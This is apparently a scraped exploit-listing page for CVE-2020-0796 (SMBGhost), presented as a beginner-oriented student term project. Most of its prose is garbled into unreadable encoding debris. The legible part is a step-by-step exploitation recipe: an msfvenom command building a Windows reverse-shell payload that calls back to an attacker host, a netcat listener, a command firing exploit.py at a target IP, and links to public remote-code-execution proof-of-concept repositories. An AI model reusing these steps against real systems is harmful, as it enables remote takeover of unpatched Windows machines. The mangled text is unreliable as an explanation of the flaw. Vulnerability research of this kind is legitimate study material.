## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-ARZUOZKAN-CVE-2020-0796
# CVE-2020-0796
CVE-2020-0796 рдХреА рд╡реНрдпрд╛рдЦреНрдпрд╛ рдФрд░ рд╢реБрд░реБрдЖрддреА рд▓реЛрдЧреЛрдВ рдХреЗ рд▓рд┐рдП рдЯрд░реНрдо рдкреНрд░реЛрдЬреЗрдХреНрдЯ CENG325 рд╣реЗрддреБ рднреЗрджреНрдпрддрд╛ рдкрд░ рд╢реЛрдз
# рдХреИрд╕реЗ рдПрдХреНрд╕рдкреНрд▓реЙрдЗрдЯ рдХрд░реЗрдВ?
рд░рд┐рд╡рд░реНрд╕ рд╢реЗрд▓ рдХреЗ рд▓рд┐рдП рдкреЗрд▓реЛрдб рдЙрддреНрдкрдиреНрди рдХрд░рдирд╛:
> msfvenom -a x64 --platform windows -p windows/x64/shell_reverse_tcp LHOST=<ATTACKER_IP> LPORT=5555 -f python
рд▓рд┐рд╕рдирд┐рдВрдЧ рдкреЛрд░реНрдЯ:
> nc -lvnp 5555
рдПрдХреНрд╕рдкреНрд▓реЙрдЗрдЯ рдХреЛрдб рдирд┐рд╖реНрдкрд╛рджрди:
> python3 exploit.py -ip TARGET_IP
# PoC рд░рд┐рдкреЙрдЬрд┐рдЯрд░реАрдЬрд╝
* https://github.com/chompie1337/SMBGhost_RCE_PoC
* https://github.com/ollypwn/SMBGhost
# рд╕рдВрджрд░реНрдн
1. CVE-2020-0796: тАЬWormableтАЭ рд░рд┐рдореЛрдЯ рдХреЛрдб рдирд┐рд╖реНрдкрд╛рджрди рднреЗрджреНрдпрддрд╛.(2020, рдорд╛рд░реНрдЪ 13). Tenable┬о. https://www.tenable.com/blog/cve-2020-0796-wormable-remote-code-execution-vulnerability-in-microsoft-server-message-block
2. тАЬIтАЩll ask your bodyтАЭ: Direct Memory Access рд╕рдВрд░рдЪрдирд╛рдУрдВ рдХрд╛ рджреБрд░реБрдкрдпреЛрдЧ рдХрд░рдиреЗ рд╡рд╛рд▓рд╛ SMBGhost рдкреНрд░реА-рдСрде RCE. (2020, рдЕрдкреНрд░реИрд▓ 20). Ricercasecurtiy.Blogspot.https://ricercasecurity.blogspot.com/2020/04/ill-ask-your-body-smbghost-pre-auth-rce.html
3. Windows 10 SMB рд╕рд░реНрд╡рд░ рдореЗрдВ CVE-2020-0796 рдореЗрдореЛрд░реА рдХрд░рдкреНрд╢рди рднреЗрджреНрдпрддрд╛| FortiGuard Labs. (2020, рдорд╛рд░реНрдЪ 12). Fortinet Blog.